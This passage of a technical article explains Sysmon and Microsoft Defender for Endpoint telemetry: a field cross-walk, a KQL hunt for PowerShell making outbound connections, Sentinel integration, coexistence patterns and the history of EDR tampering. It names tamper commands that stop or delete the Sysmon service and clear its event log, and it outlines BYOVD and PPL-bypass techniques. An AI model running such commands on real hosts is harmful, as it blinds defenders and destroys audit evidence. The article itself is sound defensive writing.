The fidelity column is the operational answer to "do I need Sysmon if I have MDE?" Where MDE is Full, Sysmon duplicates. Where MDE is Truncated, Sysmon adds the fields MDE drops. Where MDE is Omitted, Sysmon is the only collection mechanism in the host's telemetry surface. This is the cross-walk that Hartong's sysmonconfig-mde-augment.xml implements as XML rules.
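The Full / Truncated / Omitted rule is mechanical enough to encode as a lookup. The sketch below transcribes the fidelity column of the cross-walk above into a small table and derives a keep-or-drop answer from it; the function and field names are illustrative, and the per-row nuances in the disposition column (narrow targets, selected paths) are intentionally left out.

```javascript
// Fidelity values transcribed from the cross-walk table.
const crosswalk = [
  { eids: [1], name: "ProcessCreate", table: "DeviceProcessEvents", fidelity: "Full" },
  { eids: [3], name: "NetworkConnect", table: "DeviceNetworkEvents", fidelity: "Full" },
  { eids: [7], name: "ImageLoad", table: "DeviceImageLoadEvents", fidelity: "Full" },
  { eids: [8], name: "CreateRemoteThread", table: "DeviceEvents", fidelity: "Truncated" },
  { eids: [9], name: "RawAccessRead", table: null, fidelity: "Omitted" },
  { eids: [10], name: "ProcessAccess", table: "DeviceEvents", fidelity: "Truncated" },
  { eids: [11], name: "FileCreate", table: "DeviceFileEvents", fidelity: "Full" },
  { eids: [12, 13, 14], name: "RegistryEvent", table: "DeviceRegistryEvents", fidelity: "Full" },
  { eids: [17, 18], name: "PipeEvent", table: null, fidelity: "Omitted" },
  { eids: [19, 20, 21], name: "WmiEvent", table: null, fidelity: "Omitted" },
  { eids: [22], name: "DNSEvent", table: "DeviceNetworkEvents", fidelity: "Full" },
  { eids: [23], name: "FileDelete (archive)", table: "DeviceFileEvents", fidelity: "Partial" },
  { eids: [26], name: "FileDeleteDetected", table: "DeviceFileEvents", fidelity: "Full" },
  { eids: [27], name: "FileBlockExecutable", table: null, fidelity: "Omitted" },
];

// Full means Sysmon duplicates MDE; anything less means Sysmon adds signal.
function sysmonDisposition(eid) {
  const row = crosswalk.find((r) => r.eids.includes(eid));
  if (!row) return { eid, action: "unknown", reason: "not in cross-walk" };
  const action = row.fidelity === "Full" ? "drop" : "keep";
  return { eid, action, reason: `${row.name}: MDE fidelity ${row.fidelity}` };
}

for (const eid of [1, 10, 17, 23]) {
  console.log(sysmonDisposition(eid));
}
```

Event IDs that the cross-walk does not list come back as "unknown" rather than defaulting to drop, so a gap in the table never silently removes telemetry.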

The Kusto Hunt: PowerShell instances that called out within sixty seconds of spawn

The single most-frequently-cited hunting query in the Defender XDR field is some variation of the following. The query joins DeviceProcessEvents to DeviceNetworkEvents on (DeviceId, InitiatingProcessId) and surfaces every PowerShell instance that opened an outbound network connection within sixty seconds of being spawned. This is the query that turns Maya's hunch ("that base64-encoded command looks bad") into a SIEM-routable signal:

// The Kusto Hunt: PowerShell instances that called out within
// 60s of process create, joined on (DeviceId, InitiatingProcessId).
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| project DeviceId, ProcessId, ProcessCreationTime = Timestamp,
          ParentImage = InitiatingProcessFileName,
          ParentCmd   = InitiatingProcessCommandLine,
          ProcessCmd  = ProcessCommandLine,
          User        = AccountUpn
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where ActionType == "ConnectionSuccess"
    | project DeviceId, InitiatingProcessId, NetTime = Timestamp,
              RemoteIP, RemotePort, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| where (NetTime - ProcessCreationTime) between (0s .. 60s)
| where RemoteIP !startswith "10."
    and RemoteIP !startswith "192.168."
    and not(RemoteIP matches regex "^172\\.(1[6-9]|2[0-9]|3[0-1])\\.")
| project DeviceId, ProcessCreationTime, NetTime,
          ParentImage, ProcessCmd, RemoteIP, RemotePort, RemoteUrl, User
| order by NetTime desc

The query runs to about twenty operative lines and exercises four of KQL's most useful primitives: join (on a tuple key), between (for time-window matching), !startswith and the regex check (for RFC 1918 exclusion), and project (for column shaping). The between (0s .. 60s) is the crux. A legitimate PowerShell launched by a logon script may also produce a network connection within the same minute -- the filter is necessary but not sufficient. Adding ParentImage in~ ("winword.exe", "excel.exe", "outlook.exe") narrows the hunt to the Office-spawning-PowerShell pattern that fits the Emotet and Qbot families; the case-insensitive in~ matters because the parent file name can arrive as WINWORD.EXE, and plain in is case-sensitive. Adding RemoteUrl in~ (CustomTI), where CustomTI is the tenant's threat-intelligence list, narrows the hunt further to known-bad indicators.

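// JavaScript that walks through the logic of the KQL hunt.
// The actual query runs in Advanced Hunting; this runs in your browser
// so you can see the join semantics with a small synthetic dataset.

const processEvents = [
  { DeviceId: "D1", ProcessId: 7700, Timestamp: 100, FileName: "powershell.exe",
    InitiatingProcessFileName: "WINWORD.EXE",
    ProcessCommandLine: "powershell.exe -enc JABzAD0A..." },
  { DeviceId: "D2", ProcessId: 4422, Timestamp: 200, FileName: "powershell.exe",
    InitiatingProcessFileName: "explorer.exe",
    ProcessCommandLine: "powershell.exe -Help" },
];

const networkEvents = [
  { DeviceId: "D1", InitiatingProcessId: 7700, Timestamp: 130,
    ActionType: "ConnectionSuccess", RemoteIP: "185.243.115.84", RemotePort: 443 },
  { DeviceId: "D2", InitiatingProcessId: 4422, Timestamp: 215,
    ActionType: "ConnectionSuccess", RemoteIP: "10.0.0.5", RemotePort: 443 },
];

// RFC 1918 check, mirroring the three exclusions in the KQL.
function isPrivate(ip) {
  return ip.startsWith("10.") ||
    ip.startsWith("192.168.") ||
    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip);
}

// Inner join on (DeviceId, ProcessId == InitiatingProcessId), then the
// 0..60 time-window filter and the private-address exclusion.
const hits = processEvents.flatMap((p) =>
  networkEvents
    .filter((n) =>
      n.DeviceId === p.DeviceId &&
      n.InitiatingProcessId === p.ProcessId &&
      n.ActionType === "ConnectionSuccess" &&
      n.Timestamp - p.Timestamp >= 0 &&
      n.Timestamp - p.Timestamp <= 60 &&
      !isPrivate(n.RemoteIP))
    .map((n) => ({
      DeviceId: p.DeviceId,
      ParentImage: p.InitiatingProcessFileName,
      ProcessCmd: p.ProcessCommandLine,
      RemoteIP: n.RemoteIP,
      RemotePort: n.RemotePort,
    })));

console.log(JSON.stringify(hits, null, 2));
// Expected output: one hit on D1 (WINWORD-spawned powershell to public IP);
// D2 is filtered out (RemoteIP is RFC 1918 private).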

The semantics of the KQL are the semantics of the JavaScript: a relational join on a composite key, filtered by a time-window predicate and a network-class predicate. The KQL query is shorter and faster; the JavaScript is what the join is actually doing. Once a reader internalizes this pattern, the rest of the Advanced Hunting surface unfolds from it -- most other detections in the field are variants of "join Device* table A to Device* table B on (DeviceId, InitiatingProcessId), filter by time and content."

Advanced Hunting per-query quotas are 100,000 rows of returned data and 10 minutes of execution time per call [@advanced-hunting-overview]. The practical workaround for queries that exceed either limit is to pre-filter with a tighter time window (Timestamp > ago(1h) instead of ago(24h)), or to push the heavy aggregation into a Sentinel scheduled analytics rule that runs every hour and materializes the result table for further hunting.
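
The tighter-time-window workaround can be mechanized by cutting one long lookback into consecutive shorter windows and running the hunt once per window. The following is a minimal sketch under that assumption; `sliceLookback` is a hypothetical helper, not part of any Microsoft SDK, and it only generates the time-filter text to paste into a query.

```javascript
// Hypothetical helper: split a lookback of `totalHours` into consecutive
// windows of `sliceHours` and return one KQL time filter per window.
function sliceLookback(totalHours, sliceHours) {
  if (!(totalHours > 0) || !(sliceHours > 0)) {
    throw new RangeError("totalHours and sliceHours must be positive");
  }
  const windows = [];
  for (let end = 0; end < totalHours; end += sliceHours) {
    const start = Math.min(end + sliceHours, totalHours);
    // ago(start) is the older edge of the window, ago(end) the newer edge.
    windows.push(`| where Timestamp between (ago(${start}h) .. ago(${end}h))`);
  }
  return windows;
}

const hourly = sliceLookback(24, 1);
console.log(hourly.length);
console.log(hourly[0]);
```

Because between is inclusive at both ends, an event that lands exactly on a window boundary can appear in two adjacent slices; deduplicate on the join key if that matters for the hunt.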

The same query, the same columns, the same six tables surface in two different places: the Defender XDR portal itself (at security.microsoft.com legacy or defender.microsoft.com current), and inside Microsoft Sentinel via the Defender XDR connector. The two surfaces are not the same.

9. The Microsoft Sentinel Integration Model

The same KQL query runs in two different places, but the economics of the two places are not the same, and that distinction is the one that catches detection engineers off guard. In-portal Advanced Hunting and Microsoft Sentinel both expose the same Device* tables. They do not expose them with the same retention, the same join surface, or the same cost.

The connector contract

Microsoft Sentinel's Defender XDR connector (the post-Ignite-2023 successor to the legacy Microsoft 365 Defender connector) streams Microsoft Defender XDR incidents, alerts, and Advanced Hunting events into Sentinel's Log Analytics workspace. Microsoft Learn's verbatim definition is: "The Defender XDR connector allows you to stream all Microsoft Defender XDR incidents, alerts, and advanced hunting events into Microsoft Sentinel and keeps incidents synchronized between both portals" [@sentinel-xdr-connector]. The connector exposes per-table streaming, meaning the operator picks which Device* tables to bring into Sentinel and pays per-GB ingestion only on those tables.

The connector also handles the legacy-connector transition: when enabled, "any Microsoft Defender components' connectors that were previously connected are automatically disconnected in the background" [@sentinel-xdr-connector]. If a tenant was using the legacy Microsoft Defender ATP connector or per-product Defender connectors, those get retired when the unified Defender XDR connector takes over. This is the cleanup detail that catches teams off guard during the migration -- they expect both connectors to coexist for the transition window, and they do not.

Three asymmetries

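The in-portal Advanced Hunting surface and the Sentinel surface differ on three primary practitioner-level axes (retention, query surface, and cost); the table adds three secondary operational differences: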

Dimension	In-portal Advanced Hunting	Sentinel + Defender XDR connector
Retention	30 days of raw data per query [@advanced-hunting-overview]	Configurable per-workspace, up to 12 years archive [@sentinel-xdr-connector][@ms-log-analytics-archive]
Query surface	Six core `Device*` tables plus cross-domain `AlertInfo` / `EmailEvents` / `IdentityLogonEvents` / `CloudAppEvents`	Six core `Device*` tables (per-table selection) plus the entire Log Analytics workspace -- third-party logs, custom tables, ASIM-normalized data
Cost	Included with MDE Plan 2 license	Per-GB Sentinel ingestion (current GA tier) plus per-GB archive
Detection authoring	Custom detection rules; in-portal advanced-hunting-to-alert promotion	Scheduled analytics rules; SOAR playbook triggers; automation rules
Cross-tenant hunting	Tenant-bound only	Possible via Lighthouse / Sentinel Workspaces aggregation
Live response triggers	In-portal action surface	Via Logic Apps / Defender API connector

The in-portal economics are predictable: the queries are included with the license, the retention is uniform at thirty days, the surface is the six tables plus the cross-domain entity catalogue. The Sentinel economics are flexible but billable: longer retention, more table coverage, more automation, all of which carry per-GB ingestion charges. The choice is operational: which queries does the team need to run on data older than thirty days?

When each surface is the right one

For the SOC-analyst-driven, real-time threat-hunting workflow that §1 modeled with Maya -- thirty days back, six tables, cross-domain join into AlertInfo -- the in-portal Advanced Hunting surface is the obvious fit. For the longer-retention, multi-source, automated-analytic-rule workflow -- where detection engineers want a scheduled rule that joins DeviceProcessEvents to a third-party identity log on a normalized schema -- the Sentinel surface is the obvious fit.

The two surfaces are not exclusive. The most-cited operational pattern in 2026 is to keep the in-portal surface as the SOC-analyst hunting console (retention 30 days, no additional cost beyond the license) and to run the Defender XDR connector into Sentinel for the subset of tables on which the team needs longer retention or analytics-rule scheduling. Per-table selection keeps the per-GB ingestion bill predictable.

The Sentinel connector preserves table names but namespaces them inside the Log Analytics workspace; DeviceProcessEvents in Sentinel is the same shape as DeviceProcessEvents in the Defender XDR portal, and most queries port between the two surfaces unchanged. Some columns are renamed at the connector boundary -- the most common gotcha is the time-zone and timestamp representation -- but the join semantics and the cross-walk to Sysmon EIDs do not change.

The portal-URL transition

A small operational detail worth naming: the Defender XDR portal lives at both security.microsoft.com (legacy, still functional) and defender.microsoft.com (current). The new URL was announced as part of the Microsoft 365 Defender to Microsoft Defender XDR rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog]. The rebrand changed neither the KQL substrate nor the Device* schema; queries written against the legacy URL behave identically against the new URL. This is the disambiguation §1 alluded to in its layer-7 description: the same KQL query, the same tables, against either URL.

Two query surfaces, six tables, twenty-nine Sysmon EIDs, and one operational question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone? That is §10.

10. Sysmon Plus MDE: Three Coexistence Patterns

This is the operational question of the article. The community has converged on three answers, and one of them is wrong for almost every MDE-licensed environment. The three options, in order of increasing complexity and -- in most enterprise contexts -- decreasing prevalence:

Option A: Sysmon only, no MDE

Used in air-gapped environments, unlicensed environments, and regulatory contexts that prohibit cloud-side telemetry. Sysmon on its own produces a complete event stream into the local Windows event log, which a downstream collector (Windows Event Forwarding to a central collector, Splunk's Universal Forwarder, Wazuh's Windows agent, the Elastic Endpoint integration) picks up and ships to a customer-controlled SIEM. The trade-off: no cross-tenant correlation, no cloud-side threat-intelligence join, no EtwTi (kernel security ETW provider) consumption, no Microsoft-authored detection rules. The customer owns every rule themselves.

This is the right answer in a small set of contexts and the wrong answer in the licensed-enterprise context where MDE is already deployed.

Option B: MDE only, no Sysmon

The Microsoft-recommended baseline for licensed environments. MDE's Device* schema covers the high-value Sysmon EID surface -- 1, 3, 7, 10, 11, 12-14 -- at full or near-full fidelity, and MDE adds the layers Sysmon does not have: cloud-side correlation, cross-domain joins (email, identity, cloud apps), Microsoft-authored built-in detection rules with continuous tuning, the AlertInfo/AlertEvidence evidence graph, and the SOC-actionable surface (device isolation, live response, automated investigation) [@mde-ms-learn][@ms-mitre-2024-blog].

For most MDE-Plan-2-licensed organizations without a mature detection-engineering team, Option B is the right baseline. The trade-off is that the truncations and omissions in the Device* schema -- the ProcessAccess GrantedAccess mask Sysmon EID 10 surfaces verbatim that MDE drops, the WMI consumer expressions Sysmon EIDs 19-21 capture that MDE does not surface, the RawAccessRead and PipeEvent classes Sysmon captures that MDE omits entirely -- are not available to the team's custom hunting queries. For an organization without the engineering capacity to build hunting rules on those verbose surfaces, this is rarely a binding constraint.

Option C: MDE plus tuned Sysmon (Hartong's MDE-augment)

The detection-engineering-community pattern. Run MDE as the primary EDR. Run Sysmon alongside it with olafhartong/sysmon-modular's sysmonconfig-mde-augment.xml configuration, whose explicit README design intent is "intended to augment the information and have as little overlap as possible" with MDE [@github-hartong-modular]. The augment config drops the EIDs MDE covers cleanly (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8 with full SourceImage, 9 RawAccessRead, 10 with full GrantedAccess mask, 15 FileCreateStreamHash, 17-18 PipeEvent, 19-21 WmiEvent, 23 with archive variant on narrowly-scoped paths). The result is a Sysmon event-log stream that is purpose-built to complement MDE's Kusto stream, not duplicate it.
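
The drop and keep lists in the paragraph above can be turned into a quick lookup for checking how a given Sysmon EID is treated. This is a sketch over the article's own summary, not a parse of sysmonconfig-mde-augment.xml; the helper name `augmentDisposition` is hypothetical, and EID 23's path-scoping nuance is not modeled.

```javascript
// EID sets copied from the paragraph above; this is a lookup over that
// summary, not a reading of the actual augment configuration file.
const DROPPED_BY_AUGMENT = new Set([1, 3, 7, 11, 12, 13, 14, 22]);
const KEPT_BY_AUGMENT = new Set([8, 9, 10, 15, 17, 18, 19, 20, 21, 23]);

// Hypothetical helper: report how the augment pattern treats a Sysmon EID.
function augmentDisposition(eid) {
  if (DROPPED_BY_AUGMENT.has(eid)) return "drop (MDE covers it)";
  if (KEPT_BY_AUGMENT.has(eid)) return "keep (MDE truncates or omits it)";
  return "not listed in this summary";
}

for (const eid of [1, 10, 22, 26]) {
  console.log(`EID ${eid}: ${augmentDisposition(eid)}`);
}
```

For any EID that falls through to the last branch, the configuration file itself is the authority.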

Key idea: If you are an MDE-licensed shop with a detection-engineering team and you are not running Hartong's sysmonconfig-mde-augment.xml, you are paying for two EDRs and getting the coverage of one. The augment config was purpose-built to make Sysmon's verbose-field surface complementary to MDE's cloud-correlation surface, not a duplicate. Standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds: double telemetry volume, double collection and storage cost, and no incremental detection coverage.

Cost and operational complexity

The three options have different operational profiles. The summary table:

Pattern	License posture	Telemetry volume	Operational complexity	Best used for
A. Sysmon only	None (free)	Medium (depends on config)	Low (one product, one config)	Air-gapped, regulatory-no-cloud, unlicensed
B. MDE only	MDE Plan 1 or Plan 2	Cloud-controlled (no per-host volume bill)	Low (one product, Microsoft-managed)	Most MDE-licensed orgs without detection-engineering team
C. MDE + Hartong augment	MDE Plan 2 + WEF or SIEM	High on Sysmon side (verbose EIDs); low on MDE side	High (two products, modular config, WEF or SIEM forwarder)	Detection-engineering-mature SOCs
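
The table can be read as a small decision procedure. The sketch below encodes it under the simplifying assumption that three yes/no inputs are enough; the function and flag names are hypothetical, and a real decision weighs more factors than these.

```javascript
// Hypothetical decision helper encoding the three patterns from the table.
// The three boolean inputs are a simplification for illustration.
function pickCoexistencePattern({ mdeLicensed, cloudTelemetryAllowed, hasDetectionEngineering }) {
  // Air-gapped, no-cloud, or unlicensed environments fall to Option A.
  if (!mdeLicensed || !cloudTelemetryAllowed) return "A: Sysmon only";
  // Licensed environments split on detection-engineering capacity.
  return hasDetectionEngineering ? "C: MDE + Hartong augment" : "B: MDE only";
}

console.log(pickCoexistencePattern({
  mdeLicensed: true,
  cloudTelemetryAllowed: true,
  hasDetectionEngineering: false,
}));
```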

A small operational caution: standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds. The drivers coexist fine at different Filter Manager altitudes, but the event log and downstream collector now carry every Sysmon EID the default config emits, duplicating what MDE already collects on the cloud side. The double-pay problem the key idea above calls out is not theoretical; it shows up the first month a SOC team forgets to swap the default sysmonconfig.xml for sysmonconfig-mde-augment.xml.

The Hartong-augment-with-MDE pattern carries a second cost: the ETW manifest-provider session cap. Windows allows up to eight trace sessions to enable and receive events from the same manifest-based provider [@ms-etw-limits]; the EtwTi security provider, Microsoft Defender Antivirus auto-start sessions, and any WPR sessions a developer might spin up all compete for that shared pool. Adding Sysmon's session takes one. On a host with a third-party EDR that already consumes several sessions against the same provider, this can cause silent telemetry loss. Audit logman query -ets regularly.
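
Once a session inventory has been collected, the cap check itself is simple. The sketch below assumes the inventory has already been turned into a provider-to-sessions map; how that map is built from tooling output is out of scope, and the helper name, the `headroom` parameter, and the sample data are all hypothetical.

```javascript
// Limit cited in the text: at most eight trace sessions can enable the
// same manifest-based provider.
const MAX_SESSIONS_PER_MANIFEST_PROVIDER = 8;

// Hypothetical helper. `sessionsByProvider` maps a provider name to the
// trace sessions that enable it. Providers with fewer than `headroom`
// free slots are reported.
function findSaturatedProviders(sessionsByProvider, headroom = 1) {
  const atRisk = [];
  for (const [provider, sessions] of Object.entries(sessionsByProvider)) {
    const free = MAX_SESSIONS_PER_MANIFEST_PROVIDER - sessions.length;
    if (free < headroom) atRisk.push({ provider, used: sessions.length, free });
  }
  return atRisk;
}

// Synthetic inventory; the provider and session names are made up.
const inventory = {
  "Example-Provider-A": ["s1", "s2", "s3", "s4", "s5", "s6", "s7", "s8"],
  "Example-Provider-B": ["s1", "s2"],
};
console.log(findSaturatedProviders(inventory));
```

Raising `headroom` to 2 or 3 turns the check into an early warning rather than a post-mortem.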

The volume math

For sizing, assume a typical Windows endpoint generates roughly 20,000 process-create events per day under steady state (developer workstations are in this range; server volumes are higher; air-gapped jump boxes are lower) [@github-tsale-edr-telem]. The Hartong-augment config drops the top three high-volume EIDs (1 ProcessCreate, 7 ImageLoad, 11 FileCreate) that MDE already collects, retaining only the verbose surfaces. That cuts Sysmon volume by roughly 70 to 85 percent relative to a default-config Sysmon deployment, leaving only the verbose-EID stream (8, 10, 17-18, 19-21) MDE does not surface.
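
The reduction figure is a ratio, so it is easy to recompute against a fleet's own counts. In the sketch below only the 20,000-per-day figure for EID 1 comes from the text; every other per-EID count is a placeholder chosen for illustration, and `reductionPercent` is a hypothetical helper.

```javascript
// Daily event counts per Sysmon EID. Only the 20,000 figure for EID 1
// comes from the text; every other number is a made-up placeholder.
const dailyEvents = { 1: 20000, 7: 30000, 11: 15000, 8: 250, 10: 13000, 17: 2000, 18: 1000 };

// Percentage of total volume removed by dropping the given EIDs.
function reductionPercent(volumes, droppedEids) {
  const dropped = new Set(droppedEids.map(String)); // object keys are strings
  let total = 0;
  let removed = 0;
  for (const [eid, count] of Object.entries(volumes)) {
    total += count;
    if (dropped.has(eid)) removed += count;
  }
  return total === 0 ? 0 : (removed * 100) / total;
}

console.log(reductionPercent(dailyEvents, [1, 7, 11]));
```

With these placeholder counts the three dropped EIDs account for 65,000 of 81,250 daily events, or 80 percent, which sits inside the 70 to 85 percent range quoted above. Substitute measured counts before using the number for sizing.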

This is the operational answer to the question. For organisations with detection-engineering teams, Option C is the default. For organisations without, Option B is the default. Option A is correct in a narrow set of contexts and should be picked on purpose. The next two sections turn from the layered architecture to the layered attack surface, because every defense has an attacker.

11. The Attack Tradition: Telemetry Suppression on Both Halves of the Pipeline

If you run an EDR on a host, you have made a bet that the EDR can survive contact with an attacker who knows it is there. The history of that bet -- on both halves of the pipeline -- is a chronological story with named techniques and named CVEs. Twelve years of attack tradition reduce to a small number of attack classes plus the structural defenses that closed each one.

Sysmon-side attacks, in order

The earliest tampering technique for Sysmon was the most obvious: stop the driver. Until Sysmon v15 in June 2023, the Sysmon service was a normal Windows service, and a SYSTEM-privilege attacker had several easy options:

sc stop sysmon and sc delete sysmon to unload SysmonDrv.sys.
Rewrite the minifilter altitude so Sysmon loads after a tamper hook.
wevtutil cl Microsoft-Windows-Sysmon/Operational to erase history.
Rewrite SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters to re-program Sysmon's filter without restarting it.
Register a Windows event-channel ACL change to silence Microsoft-Windows-Sysmon.

A small family of community-published tools automated this class. The structural defense, before v15, was discipline: keep SYSTEM out of attacker hands.

The June 2023 v15 protected-process gate is the structural response to this entire class. Microsoft Learn states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. A SYSTEM-privilege attacker can no longer OpenProcess(PROCESS_TERMINATE) against Sysmon.exe, inject code into the service's address space, or attach a user-mode debugger. The class is not closed -- a kernel primitive still works, and a BYOVD chain that can write _EPROCESS.Protection defeats the gate -- but the bar moves from "a wevtutil command in a PowerShell window" to "a kernel exploit primitive."

MDE-side attacks, in order

The MDE-side attack tradition starts at the Antimalware-PPL boundary on MsSense.exe. The FalconForce 2022 work this article has already cited multiple times is the dispositive primary [@falconforce-2022]. The verbatim TL;DR -- describing how raising dbgsrv.exe to WinTcb PPL lets researchers debug MDE and capture cloud-bound payloads, which surfaced a missing-authorization vulnerability allowing spoofed telemetry to any M365 tenant -- landed earlier as the §6 PullQuote and is the framing this section builds on.

The technique used a PPLKiller-class BYOVD chain to raise dbgsrv.exe to WinTcb PPL, attach to MsSense.exe, and capture plaintext payloads via SspiCli!EncryptMessage instrumentation. The vulnerability that work disclosed, CVE-2022-23278, was patched on March 8, 2022 [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. That patch closed one missing-authorization gap in the cloud-side trust model. It did not close the class.

The InfoGuard Labs 2025 follow-up [@infoguard-2025] demonstrated that the broader class is still open. The technique they used was different -- in-memory patching of CRYPT32!CertVerifyCertificateChainPolicy to disable certificate-pinning validation, rather than PPL-elevated debugging -- but the vulnerability they surfaced is the same class: cloud endpoints (/edr/commands/cnc and /senseir/v1/actions/) that do not properly validate authentication tokens on traffic claiming to originate from the endpoint. As §7 documented, the MSRC disposition was low severity, no fix committed -- the operational consequence is that the spoofed-telemetry trust pattern that produced CVE-2022-23278 in 2022 is, three years later, still exploitable along a parallel surface.

The broader attack class -- ETW Threat Intelligence (EtwTi) blinding -- has been studied independently of MDE. The structural answer in 2026 is HVCI plus VBL plus Antimalware-PPL plus ELAM (the four-component hardening stack). On a fully-hardened endpoint, the user-mode tamper surface that defined the 2014-to-2020 era of EDR-blinding tradecraft is largely closed; the residual attack surface is kernel-mode adversary primitives. That is the structural ceiling §12 picks up.

Cross-pipeline attacks

Some attacks affect both halves of the pipeline simultaneously. The most-cited is BYOVD-driven kernel-callback removal: a Bring-Your-Own-Vulnerable-Driver chain loads a Microsoft-signed but vulnerable driver, exploits a known CVE in the driver, and from kernel context calls PsSetCreateProcessNotifyRoutineEx with a Remove = TRUE flag against the EDR sensor's registered callbacks, effectively unhooking both Sysmon and MDE at the kernel-callback layer. The structural defense Microsoft shipped in response is the Microsoft Vulnerable Driver Blocklist with HVCI enforcement, which has been on by default since Windows 11 22H2 [@ms-driver-blocklist].

A second cross-pipeline attack is direct-syscall bypass of user-mode hook libraries -- but this attack is mostly a relic from the 2010s when EDR vendors relied on ntdll.dll user-mode IAT hooks; modern Sysmon and MDE neither register nor depend on user-mode hooks for the kernel-callback events. Direct-syscall malware that bypasses the user-mode hooks of a third-party EDR will still produce a Sysmon EID 1 and an MDE DeviceProcessEvents row, because the kernel-callback fires whether or not the malware called NtCreateUserProcess via ntdll.dll.

The attack-surface lattice

flowchart TD
    A1["Sysmon-side: sc stop, wevtutil clear, registry altitude swap"] --> D1[Sysmon v15 protected-process gate]
    A2["MDE-side: PPLKiller + dbgsrv WinTcb to attach MsSense"] --> D2["Antimalware-PPL on MsSense.exe"]
    A3["Cloud-side: CVE-2022-23278 spoofed cloud telemetry"] --> D3["MSRC patch March 8 2022"]
    A4["Cloud-side: InfoGuard 2025 cert-pinning bypass + missing auth"] --> O4["OPEN: 'low severity, no fix committed'"]
    A5["Cross-pipeline: BYOVD kernel-callback unhook"] --> D5["HVCI + Vulnerable Driver Blocklist (Win11 22H2+)"]
    D1 --> R["Residual: kernel-mode adversary primitive that defeats HVCI + VBL"]
    D2 --> R
    D5 --> R
    D3 --> R
    O4 -.unclosed.-> R

The shape of the lattice is the shape of the field's hardening: every user-mode attack class has a structural defense, and the structural defenses converge on a single residual -- the kernel-mode adversary primitive that defeats HVCI plus the Vulnerable Driver Blocklist. On the cloud side, the InfoGuard 2025 finding is the unresolved item -- the same trust pattern that produced CVE-2022-23278 in 2022 produced a different cluster of missing-authorization bugs three years later. The attack-defense arc is still moving, and the two-sided nature of the pipeline (host + cloud) is why.

Every attack surface has a structural defense. But every defense has a horizon. What is outside the horizon?

12. Theoretical Limits: What the Pipeline Cannot See

Sysmon and Microsoft Defender for Endpoint are observation pipelines, not enforcement layers. That statement contains four structural ceilings the engineering cannot lift. These are not bugs to be fixed; they are properties of the architecture that follow from the choice of where the pipeline collects.

Ceiling 1: The pre-driver-load horizon

Both Sysmon's SysmonDrv.sys and Defender for Endpoint's WdBoot.sys are kernel drivers, but they sit at different points in the boot order. WdBoot.sys is ELAM-signed and loads before any non-ELAM driver, which lets it classify subsequent boot-start drivers as Good, Bad, or Unknown for the kernel's load decision. (Measured Boot separately hashes WdBoot.sys along with the bootloader and kernel into TPM PCRs; that integrity-attestation channel is a sibling feature, not ELAM's own job.) SysmonDrv.sys is BootStart-ordered but not ELAM-signed -- it loads early, but not first.

Events that happen before the EDR driver's DriverEntry runs are not observable by that driver. For Sysmon, that means rootkit-class malware that loads inside the early Windows boot path (UEFI bootkits, boot-record manipulation, very-early kernel modifications) is invisible until after Sysmon catches up. For MDE, the ELAM-signed WdBoot.sys closes most of this window for non-ELAM drivers; the residual is anything that runs even earlier -- UEFI-firmware-resident malware, hardware-implant attacks, the very narrow class that targets the pre-ELAM trust boundary itself. The Measured Boot plus Secure Boot stack (covered in adjacent articles in this series) is what observes the pre-ELAM region. EDR's reach does not extend below the ELAM line.

Ceiling 2: The observation-vs-enforcement latency gap

Sysmon's kernel-callback to event-log latency is typically sub-millisecond. The driver runs the rule engine, decides to emit, and writes through the ETW publisher to the Sysmon service. The service writes to the event log. The total path is microseconds in the best case, milliseconds under load.

MDE's end-to-end latency to a queryable Kusto row is seconds to tens of seconds. The endpoint side takes microseconds; the TLS hop to regional ingest takes the dominant fraction of a second; the Kusto write and per-tenant indexing takes the rest. Microsoft's own Advanced Hunting documentation phrases the freshness contract carefully: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, longer under load, and indefinite when the endpoint cannot reach the cloud.

Any payload that completes its work inside the observation window has executed before the SIEM rule could fire. A mimikatz.exe invocation that dumps LSA secrets in three milliseconds, exfiltrates them over a covert DNS channel in 800 milliseconds, and exits in another two milliseconds has produced a complete attack chain before MDE's event has reached Kusto, let alone before the Maya-class analyst has glanced at her console. The hybrid responses that blur this boundary -- Sysmon v14's FileBlockExecutable (EID 27), MDE's ASR rules and Network Protection -- are kernel-callback-time decisions, not SIEM-rule-time decisions; they run inside the few-microsecond window the driver itself owns, and they are constrained by the rule logic baked into the host configuration rather than by the live correlation logic of the cloud-side detection engine.
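
The race in that example is plain arithmetic. The sketch below adds up the three stage durations from the mimikatz scenario and compares the total with an assumed time-to-queryable figure; the 5,000 ms value is an illustrative pick from the "seconds to tens of seconds" range, not a measured or documented latency.

```javascript
// Stage durations in milliseconds, taken from the mimikatz example above.
const attackStagesMs = { dumpSecrets: 3, exfiltrateOverDns: 800, exit: 2 };

// Assumed figure: the text says "seconds to tens of seconds"; 5,000 ms is
// an illustrative pick, not a measured or documented latency.
const assumedQueryableLatencyMs = 5000;

function chainDurationMs(stages) {
  return Object.values(stages).reduce((sum, ms) => sum + ms, 0);
}

const durationMs = chainDurationMs(attackStagesMs);
const finishedBeforeVisible = durationMs < assumedQueryableLatencyMs;
console.log(`attack chain: ${durationMs} ms`);
console.log(`finished before the row was queryable: ${finishedBeforeVisible}`);
```

The chain totals 805 ms, so under this assumption it is complete several seconds before the first row could be queried.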

Ceiling 3: MDE schema truncation versus Sysmon manifest

